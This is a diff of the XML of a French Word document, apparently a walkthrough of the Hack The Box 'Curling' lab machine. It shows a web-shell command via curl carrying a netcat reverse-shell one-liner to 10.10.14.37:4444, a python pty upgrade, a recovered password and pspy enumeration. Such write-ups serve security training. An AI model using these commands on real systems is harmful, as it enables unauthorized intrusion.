+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="1294765"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Nous pouvons avoir un TTY shell (</w:t>
+      </w:r>
+      <w:r>
+        <w:t>nécessaire</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> pour utiliser sudo)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> avec </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>python3</w:t>
+      </w:r>
+      <w:r>
+        <w:t> :</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9062"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9062" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">$ python3 -c </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">"import </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>pty</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t> ;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>pty</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>.spawn</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>('/bin/bash')</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>"</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Malheureusement, le mot de p</w:t>
+      </w:r>
+      <w:r>
+        <w:t>asse Curling</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>2018!</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Ne fonctionne pas sur l’utilisateur floris, nous allons donc devoir chercher.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Dans son home, le fichier </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>password_backup</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> a l’air intéressant :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75B6AB61" wp14:editId="7BD99029">
+            <wp:extent cx="4514850" cy="619125"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="11" name="Image 11"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4514850" cy="619125"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CF15A1E" wp14:editId="78B2B673">
+            <wp:extent cx="5760720" cy="3333115"/>
+            <wp:effectExtent l="0" t="0" r="0" b="635"/>
+            <wp:docPr id="12" name="Image 12"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="3333115"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Ceci a l’air d’être un dump </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Hex</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, nous pouvons alors le décoder avec </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>xxd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">en bak </w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ED0DEFE" wp14:editId="7DB3E582">
+            <wp:extent cx="5760720" cy="402590"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="13" name="Image 13"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="402590"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Les prochaines manipulations ne sont pas évidentes, puisqu’il s’agit enfaite d’une archive archivé 2 fois, après avoir passé beaucoup de temps, l’archive final nous donne </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>password.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:t> :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="768A0DF0" wp14:editId="2945A2C1">
+            <wp:extent cx="3838575" cy="676275"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="14" name="Image 14"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3838575" cy="676275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Et nous pouvons nous logger avec ce mot de passe </w:t>
+      </w:r>
+      <w:r>
+        <w:t>en</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>floris</w:t>
+      </w:r>
+      <w:r>
+        <w:t> :</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -193,6 +1486,46 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18621462" wp14:editId="444DD71E">
+            <wp:extent cx="3170285" cy="1056762"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="15" name="Image 15"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3186466" cy="1062156"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="36"/>
@@ -222,11 +1555,8 @@
         <w:t>Obtenir un accès administrateur</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Bla</w:t>
-      </w:r>
-    </w:p>
+    <w:p/>
+    <w:p/>
     <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -795,6 +2125,48 @@
       <w:contextualSpacing/>
     </w:pPr>
   </w:style>
+  <w:style w:type="table" w:styleId="Grilledutableau">
+    <w:name w:val="Table Grid"/>
+    <w:basedOn w:val="TableauNormal"/>
+    <w:uiPriority w:val="39"/>
+    <w:rsid w:val="00893EFB"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:tblPr>
+      <w:tblBorders>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+      </w:tblBorders>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Lienhypertexte">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00CC2B12"/>
+    <w:rPr>
+      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Mentionnonrsolue">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00CC2B12"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 

--- a/Facile/[easy] Curling.docx
+++ b/Facile/[easy] Curling.docx
@@ -281,19 +281,8 @@
                 <w:rFonts w:cstheme="minorHAnsi"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>"</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cstheme="minorHAnsi"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>html,php</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t>"html,php</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -305,7 +294,13 @@
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:r>
         <w:rPr>
@@ -625,17 +620,8 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Curling</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>2018!</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>Curling2018!</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -750,7 +736,6 @@
       <w:r>
         <w:t xml:space="preserve">Sur le home, à gauche, il faut aller dans </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -758,11 +743,9 @@
         </w:rPr>
         <w:t>template</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">, puis </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -770,7 +753,6 @@
         </w:rPr>
         <w:t>template</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>, cliquer sur une page et rajouter le code PHP pour rajouter un paramètre :</w:t>
       </w:r>
@@ -863,23 +845,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Maintenant nous mettons en place un </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>listener</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> sur kali et nous </w:t>
+        <w:t xml:space="preserve">Maintenant nous mettons en place un listener netcat sur kali et nous </w:t>
       </w:r>
       <w:r>
         <w:t>exécutons</w:t>
@@ -905,13 +871,8 @@
             <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Curl</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
+            <w:r>
+              <w:t xml:space="preserve">Curl </w:t>
             </w:r>
             <w:hyperlink r:id="rId16" w:history="1">
               <w:r>
@@ -928,113 +889,13 @@
               <w:rPr>
                 <w:rFonts w:cstheme="minorHAnsi"/>
               </w:rPr>
-              <w:t>'cmd=</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>'cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|n</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:cstheme="minorHAnsi"/>
               </w:rPr>
-              <w:t>rm</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cstheme="minorHAnsi"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> /</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cstheme="minorHAnsi"/>
-              </w:rPr>
-              <w:t>tmp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cstheme="minorHAnsi"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cstheme="minorHAnsi"/>
-              </w:rPr>
-              <w:t>f;mkfifo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cstheme="minorHAnsi"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> /</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cstheme="minorHAnsi"/>
-              </w:rPr>
-              <w:t>tmp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cstheme="minorHAnsi"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cstheme="minorHAnsi"/>
-              </w:rPr>
-              <w:t>f;cat</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cstheme="minorHAnsi"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> /</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cstheme="minorHAnsi"/>
-              </w:rPr>
-              <w:t>tmp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cstheme="minorHAnsi"/>
-              </w:rPr>
-              <w:t>/f|/bin/sh -i 2&gt;&amp;1|n</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cstheme="minorHAnsi"/>
-              </w:rPr>
-              <w:t>c 10.10.14.37 4444 &gt;/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cstheme="minorHAnsi"/>
-              </w:rPr>
-              <w:t>tmp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cstheme="minorHAnsi"/>
-              </w:rPr>
-              <w:t>/f</w:t>
+              <w:t>c 10.10.14.37 4444 &gt;/tmp/f</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1148,48 +1009,7 @@
                 <w:rFonts w:cstheme="minorHAnsi"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve">"import </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cstheme="minorHAnsi"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>pty</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cstheme="minorHAnsi"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t> ;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cstheme="minorHAnsi"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>pty</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cstheme="minorHAnsi"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>.spawn</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cstheme="minorHAnsi"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>('/bin/bash')</w:t>
+              <w:t>"import pty ;pty.spawn('/bin/bash')</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1214,20 +1034,11 @@
         <w:t>Malheureusement, le mot de p</w:t>
       </w:r>
       <w:r>
-        <w:t>asse Curling</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>2018!</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Ne fonctionne pas sur l’utilisateur floris, nous allons donc devoir chercher.</w:t>
+        <w:t>asse Curling2018! Ne fonctionne pas sur l’utilisateur floris, nous allons donc devoir chercher.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> Dans son home, le fichier </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -1235,7 +1046,6 @@
         </w:rPr>
         <w:t>password_backup</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> a l’air intéressant :</w:t>
       </w:r>
@@ -1326,17 +1136,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Ceci a l’air d’être un dump </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Hex</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, nous pouvons alors le décoder avec </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">Ceci a l’air d’être un dump Hex, nous pouvons alors le décoder avec </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -1344,7 +1145,6 @@
         </w:rPr>
         <w:t>xxd</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t> </w:t>
       </w:r>
@@ -1556,8 +1356,173 @@
       </w:r>
     </w:p>
     <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Nous transférons et exécutons psp64 sur la box pour une énumération scriptée :</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9062"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9062" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>################################# Sur kali</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">$ scp pspy64 </w:t>
+            </w:r>
+            <w:hyperlink r:id="rId23" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Lienhypertexte"/>
+                </w:rPr>
+                <w:t>floris@10.10.10.150:/tmp</w:t>
+              </w:r>
+            </w:hyperlink>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>################################# Sur curling</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>$ cd /tmp</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>$ chmod +x pspy64</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>$ ./pspy64</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
     <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38161530" wp14:editId="55A7E865">
+            <wp:extent cx="5760720" cy="1394460"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="16" name="Image 16"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
